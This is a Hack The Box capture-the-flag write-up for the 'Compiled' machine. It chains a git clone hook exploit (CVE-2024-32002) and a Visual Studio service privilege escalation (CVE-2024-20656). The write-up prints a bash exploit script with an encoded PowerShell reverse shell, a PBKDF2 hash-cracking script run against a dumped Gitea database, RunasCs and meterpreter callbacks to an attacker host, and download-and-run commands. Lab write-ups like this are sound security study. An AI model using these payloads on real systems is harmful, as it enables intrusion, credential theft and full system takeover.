Hackthebox: Compiled

Overview

Compiled is a medium-difficulty machine from Hack The Box . It’s pretty straight forward as it deals directly with 2 CVEs from the year 2024 in order to pwn it. Initially we’ll deal with CVE-2024-32002 which is a git-rce exploit allowing you to abuse git clone to expose .git/ directory to git’s execution context. Later exploiting CVE-2024-20656 which will abuse VSCode’s VSStandardCollectorService150 service -setup by default as NT AUTHORITY\SYSTEM- to get our privileged shell. Hope you enjoy it!

Compiled-info-card

Reconnaissance

PS C:\Users\0xkujen> nmap -A -Pn 10.129.253.115 
Starting Nmap 7.95 ( https://nmap.org ) at 2024-12-13 15:40 W. Central Africa Standard Time
Nmap scan report for 10.129.253.115
Host is up (1.6s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
3000/tcp open  http    Golang net/http server
| fingerprint-strings:
|   GenericLines, Help, RTSPRequest:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 200 OK
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Content-Type: text/html; charset=utf-8
|     Set-Cookie: i_like_gitea=f629d85303be2590; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=3H-4uwqM0T21f96Y2AnD3O-Vdco6MTczNDEwMTM3NDY0NDIzNzMwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Fri, 13 Dec 2024 14:49:34 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-arc-green">
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title>Git</title>
|     <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR2l0Iiwic2hvcnRfbmFtZSI6IkdpdCIsInN0YXJ0X3VybCI6Imh0dHA6Ly9naXRlYS5jb21waWxlZC5odGI6MzAwMC8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL2dpdGVhLmNvbXBpbGVkLmh0YjozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1hZ2UvcG5nIiwic2l6ZXMiOiI1MTJ4NTEyIn0seyJzcmMiOiJodHRwOi8vZ2l0ZWEuY29tcGlsZWQuaHRiOjMwMDA
|   HTTPOptions:
|     HTTP/1.0 405 Method Not Allowed
|     Allow: HEAD
|     Allow: HEAD
|     Allow: GET
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Set-Cookie: i_like_gitea=1f26abc6f135dbd0; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=OvRjhGVT_QhYWSN-YXNnKLl5mBI6MTczNDEwMTM3ODc0MjY0ODgwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Fri, 13 Dec 2024 14:49:38 GMT
|_    Content-Length: 0
|_http-title: Git
5000/tcp open  http    Werkzeug httpd 3.0.3 (Python 3.12.3)
|_http-server-header: Werkzeug/3.0.3 Python/3.12.3
|_http-title: Compiled - Code Compiling Services
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.95%I=7%D=12/13%Time=675C4815%P=i686-pc-windows-windows
<snip>

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 263.07 seconds

We can see that we have ports 22 (ssh), 5000 (http) and 3000(http) open. Port 3000 seems like the backend since it’s running on golang and port 5000 seems like the frontend since its running python’s werkzeug.
Let’s discover!

Web Application - http://10.129.253.115:5000

Web App - Port 5000

We can see that we could enter a specific Git repo URL and it will get compiled by the application. Sus, right?!
When I first pwned the machine I spent a lot of time on this feature. However I got nowhere.

Web Application - http://10.129.253.115:3000

Navigating to the Gitea interface on port 3000, we found a couple of interesting repos after registering for an account:

Web App - Port 3000

CVE-2024-32002 - Richard

Taking a closer look at the Calculator repository, we can see this interesting info:

CVE-2024-32002

Doing some ninja lookup on the mighty google, I stumbled into this amazing explanation and overview of CVE-2024-32002 alongside this amazing poc on Github .

LESSGERIT!

Having these two amazing resources, I just created a simple bash script that’s adequate to my needs:

#!/bin/bash

git config --global protocol.file.allow always
git config --global core.symlinks true
git config --global init.defaultBranch main

rm -rf repo1
rm -rf repo2



git clone http://gitea.compiled.htb:3000/kujen/repo1.git
cd repo1
mkdir -p y/hooks



cat > y/hooks/post-checkout <<EOF
#!bin/sh.exe
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMgAzACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
EOF



chmod +x y/hooks/post-checkout


git add y/hooks/post-checkout
git commit -m "post-checkout"


git push
cd ..

git clone http://gitea.compiled.htb:3000/kujen/repo2.git
cd repo2
git submodule add --name x/y "http://gitea.compiled.htb:3000/kujen/repo1.git" A/modules/x
git commit -m "add-submodule"



printf ".git" > dotgit.txt
git hash-object -w --stdin < dotgit.txt > dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
git update-index --index-info < index.info
git commit -m "add-symlink"
git push

You can put whatever you want into the pos-checkout file as your reverse shell script. I just usually use The powershell Base64 payload from revshells.com . You might do that as well :)
We execute this payload:

kujen@kujen:~$ ./exploit.sh
Cloning into 'repo1'...
warning: You appear to have cloned an empty repository.
[main (root-commit) c5d01ff] post-checkout
 1 file changed, 2 insertions(+)
 create mode 100755 y/hooks/post-checkout
kUsername for 'http://gitea.compiled.htb:3000':kujen
Password for 'http://[email protected]:3000':
Enumerating objects: 5, done.
Counting objects: 100% (5/5), done.
Delta compression using up to 16 threads
Compressing objects: 100% (2/2), done.
Writing objects: 100% (5/5), 910 bytes | 910.00 KiB/s, done.
Total 5 (delta 0), reused 0 (delta 0), pack-reused 0
remote: . Processing 1 references
remote: Processed 1 references in total
To http://gitea.compiled.htb:3000/kujen/repo1.git
 * [new branch]      main -> main
Cloning into 'repo2'...
remote: Enumerating objects: 3, done.
remote: Counting objects: 100% (3/3), done.
remote: Total 3 (delta 0), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (3/3), done.
Cloning into '/home/kujen/repo2/A/modules/x'...
remote: Enumerating objects: 5, done.
remote: Counting objects: 100% (5/5), done.
remote: Compressing objects: 100% (2/2), done.
remote: Total 5 (delta 0), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (5/5), done.
[main bf81e43] add-submodule
 2 files changed, 4 insertions(+)
 create mode 100644 .gitmodules
 create mode 160000 A/modules/x
On branch main
Your branch is ahead of 'origin/main' by 1 commit.
  (use "git push" to publish your local commits)

Untracked files:
  (use "git add <file>..." to include in what will be committed)
        dot-git.hash
        dotgit.txt
        index.info

nothing added to commit but untracked files present (use "git add" to track)
Username for 'http://gitea.compiled.htb:3000': kujen
Password for 'http://[email protected]:3000':
Enumerating objects: 6, done.
Counting objects: 100% (6/6), done.
Delta compression using up to 16 threads
Compressing objects: 100% (3/3), done.
Writing objects: 100% (5/5), 456 bytes | 456.00 KiB/s, done.
Total 5 (delta 0), reused 0 (delta 0), pack-reused 0
remote: . Processing 1 references
remote: Processed 1 references in total
To http://gitea.compiled.htb:3000/kujen/repo2.git
   b6ea876..bf81e43  main -> main

Later we just need to clone the second repo which will be cloned by the system and automatically executing our code. We head over to http://compiled.htb:5000 and clone http://gitea.compiled.htb:3000/kujen/repo2.git, looking at our terminal we get a callback 8)

PS C:\Users\0xkujen> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.253.115] 54524
whoami
Richard
PS C:\Users\Richard\source\cloned_repos\3l6jy\.git\modules\x>

Now as we usually do, let’s head over and check for any database credentials:

PS C:\program files\Gitea\data> ls


    Directory: C:\program files\Gitea\data


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         5/22/2024   8:08 PM                actions_artifacts
d-----         5/22/2024   8:08 PM                actions_log
d-----         5/22/2024   8:08 PM                attachments
d-----         5/22/2024   8:08 PM                avatars
d-----        12/13/2024   4:14 PM                gitea-repositories
d-----         5/22/2024   8:08 PM                home
d-----         5/22/2024   8:08 PM                indexers
d-----         5/22/2024   8:08 PM                jwt
d-----         5/22/2024   8:08 PM                lfs
d-----         5/22/2024   8:08 PM                packages
d-----         5/22/2024   8:08 PM                queues
d-----         5/22/2024   8:08 PM                repo-archive
d-----         5/22/2024   8:08 PM                repo-avatars
d-----         5/25/2024  10:40 PM                sessions
d-----         5/24/2024   5:32 PM                tmp
-a----        12/13/2024   4:32 PM        2023424 gitea.db

We can see that we have a gitea.db file, let’s transfer it over to our machine and check it out:

sqlite> select * from user;
1|administrator|administrator||[email protected]|0|enabled|1bf0a9561cf076c5fc0d76e140788a91b5281609c384791839fd6e9996d3bbf5c91b8eee6bd5081e42085ed0be779c2ef86d|pbkdf2$50000$50|0|0|0||0|||6e1a6f3adbe7eab92978627431fd2984|a45c43d36dce3076158b19c2c696ef7b|en-US||1716401383|1716669640|1716669640|0|-1|1|1|0|0|0|1|0||[email protected]|0|0|0|0|0|0|0|0|0||arc-green|0
2|richard|richard||[email protected]|0|enabled|4b4b53766fe946e7e291b106fcd6f4962934116ec9ac78a99b3bf6b06cf8568aaedd267ec02b39aeb244d83fb8b89c243b5e|pbkdf2$50000$50|0|0|0||0|||2be54ff86f147c6cb9b55c8061d82d03|d7cf2c96277dd16d95ed5c33bb524b62|en-US||1716401466|1720089561|1720089548|0|-1|1|0|0|0|0|1|0||[email protected]|0|0|0|0|2|0|0|0|0||arc-green|0
4|emily|emily||[email protected]|0|enabled|97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16|pbkdf2$50000$50|1|0|0||0|||0056552f6f2df0015762a4419b0748de|227d873cca89103cd83a976bdac52486|||1716565398|1716567763|0|0|-1|1|0|0|0|0|1|0||[email protected]|0|0|0|0|0|0|0|2|0||arc-green|0
6|kujen|kujen||[email protected]|0|enabled|0e484ec04d6b69b8970b7742caaf538def0c6f411c3158626ef0213981c0b66d4c94c62e333361a2006d31d28fc7cdf312cf|pbkdf2$50000$50|0|0|0||0|||e23da4d7e550566fa29c210202f22d6d|6b5342ba86af1a0b3615b84f849f63aa|en-US||1722107387|1722174569|1722174569|0|-1|1|0|0|0|0|1|0||[email protected]|0|0|0|0|8|0|0|0|0||arc-green|0
sqlite> 

We can see that we have multiple hashes, the crackable one is EMily’s (Really lame password tho :’( )
For some reason I was not able to crack the hash using hashcat (mode 10900) due to its’ complexity. However, I did create my own decryptor for it (thanks chatgpt, really <3):

import hashlib
import binascii
def pbkdf2_hash(password, salt, iterations, dklen):
    hash_value = hashlib.pbkdf2_hmac(
    hash_name='sha256', 
    password=password, 
    salt=salt, 
    iterations=iterations, 
    dklen=dklen 
    )
    return hash_value

salt = binascii.unhexlify('227d873cca89103cd83a976bdac52486')
dklen=50
iterations=50000
target_hash = '97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16'
dictionary_file = '/usr/share/wordlists/rockyou.txt'
target_hash_bytes=binascii.unhexlify(target_hash)
with open(dictionary_file, 'r', encoding='utf-8',errors="ignore") as f:

    for line in f:

        password = line.strip().encode('UTF-8')
        hash_value = pbkdf2_hash(password, salt, iterations, dklen)
        if hash_value == target_hash_bytes:
                print(f"Got it!!!! : {password}")
                break      

This code reads passwords from rockyou.txt, hashes each password using PBKDF2 with SHA-256, a given salt, 50,000 iterations, and a derived key length of 50 bytes. It compares each hashed password to a target hash, attempting to find the matching password. If a match is found, it prints the correct password and stops further processing.
And yes, our password was the usual 12345678 :’(

                                                                                                                    
┌──(kali㉿kali)-[~/Desktop]
└─$ python3 decryptor.py
Got it!!!! : b'12345678'

I can now get a shell as Emily using runasCS.exe:

PS C:\program files\Gitea\data> iwr 10.10.x.x/RunasCs.exe -outfile r.exe
PS C:\program files\Gitea\data> ./r.exe emily 12345678 powershell.exe -r 10.10.x.x 4444
[-] RunasCsException: Invalid remote value: 10.10.x.x
[-] Expected format: 'host:port'
PS C:\program files\Gitea\data> ./r.exe emily 12345678 powershell.exe -r 10.10.x.x:4444

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-1ed32e3$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 1204 created in background.
PS C:\program files\Gitea\data>

PS C:\Users\0xkujen> nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.253.115] 54568
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Windows\system32> whoami
whoami
compiled\emily
PS C:\Windows\system32>

And we got our user flag:

PS C:\users\emily\desktop> cat user.txt
cat user.txt
c894415d6de81f******************
PS C:\users\emily\desktop>

Privilege Escalation to NT Authority\System - CVE-2024-20656

Taking a closer look on the machine, we can see that we have Visual Studio Code installed:

PS C:\program files (x86)\Microsoft Visual Studio> ls
ls


    Directory: C:\program files (x86)\Microsoft Visual Studio


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         1/29/2024   9:07 PM                2019
d-----         1/20/2024   1:57 AM                Installer
d-----         1/20/2024   2:04 AM                Shared

That directly gives me the thought of CVE-2024-20656 (especially since the machine avatar is also VSCode lol).
When Visual Studio is installed with C/C++ support VSStandardCollectorService150 service is created and is configured to run as NT AUTHORITY\SYSTEM :

PS C:\program files (x86)\Microsoft Visual Studio> sc.exe qc VSStandardCollectorService150
sc.exe qc VSStandardCollectorService150
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: VSStandardCollectorService150
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : "C:\Program Files (x86)\Microsoft Visual Studio\Shared\Common\DiagnosticsHub.Collection.Service\StandardCollector.Service.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Visual Studio Standard Collector Service 150
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
PS C:\program files (x86)\Microsoft Visual Studio>

This article has a great overview over the vulnerability, steps to reproduce it and we have this amazing github repo with a POC for the exploit, lessgo.
Now we can clone the project => open it in Visual Studio alongside the C/C++ package installed => modify the cmd[] parameter to include the VSCode VSDiagnostics.exe executable path => C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe => Modify our reverse shell executable path on the CopyFile function line => build the project and execute our malicious code => BOOM.

CVE-2024-20656

And now create a reverse shell executable using msfvenom, import all the file to the system and get our reverse shell !

┌──(kali㉿kali)-[~/Desktop]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.x.x LPORT=4455 -f exe > aaa.exe   
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
                                                                                                                    
┌──(kali㉿kali)-[~/Desktop]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.253.115 - - [13/Dec/2024 18:09:35] "GET /aaa.exe HTTP/1.1" 200 -
10.129.253.115 - - [13/Dec/2024 18:09:39] "GET /Expl.exe HTTP/1.1" 200 -

PS C:\tmp> iwr 10.10.x.x/aaa.exe -outfile aaa.exe
iwr 10.10.x.x/aaa.exe -outfile aaa.exe
PS C:\tmp> iwr 10.10.x.x/Expl.exe -outfile Expl.exe
iwr 10.10.x.x/Expl.exe -outfile Expl.exe
PS C:\tmp> ls
ls


    Directory: C:\tmp


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----        12/13/2024   6:15 PM          73802 aaa.exe                                                              
-a----        12/13/2024   6:15 PM         171008 Expl.exe                                                             
-a----        12/13/2024   5:15 PM          51712 r.exe                                                                


PS C:\tmp> ./r.exe emily 12345678 "c:/tmp/Expl.exe"
./r.exe emily 12345678 "c:/tmp/Expl.exe"

[+] Junction \\?\C:\580c1976-923c-40e4-8279-1ce253ae3e99 -> \??\C:\cb8342cd-d86c-4883-bc0a-5686b8bc8cef created!
[+] Symlink Global\GLOBALROOT\RPC Control\Report.0197E42F-003D-4F91-A845-6404CF289E84.diagsession -> \??\C:\Programdata created!
[+] Junction \\?\C:\580c1976-923c-40e4-8279-1ce253ae3e99 -> \RPC Control created!
[+] Junction \\?\C:\580c1976-923c-40e4-8279-1ce253ae3e99 -> \??\C:\cb8342cd-d86c-4883-bc0a-5686b8bc8cef created!
[+] Symlink Global\GLOBALROOT\RPC Control\Report.0297E42F-003D-4F91-A845-6404CF289E84.diagsession -> \??\C:\Programdata\Microsoft created!
[+] Junction \\?\C:\580c1976-923c-40e4-8279-1ce253ae3e99 -> \RPC Control created!
[+] Persmissions successfully reseted!
[*] Starting WMI installer.
[*] Command to execute: C:\windows\system32\msiexec.exe /fa C:\windows\installer\8ad86.msi
[*] Oplock!
[+] File moved!
PS C:\tmp> 

And we are in!

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.x.x:4455 
[*] Sending stage (177734 bytes) to 10.129.253.115
[*] Meterpreter session 1 opened (10.10.x.x:4455 -> 10.129.253.115:54603) at 2024-12-13 18:10:39 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > cat "c:/users/administrator/desktop/root.txt"
dfa95100a5e25f******************
meterpreter > 

That was it for Compiled, hope you learned a thing or two :)
-0xkujen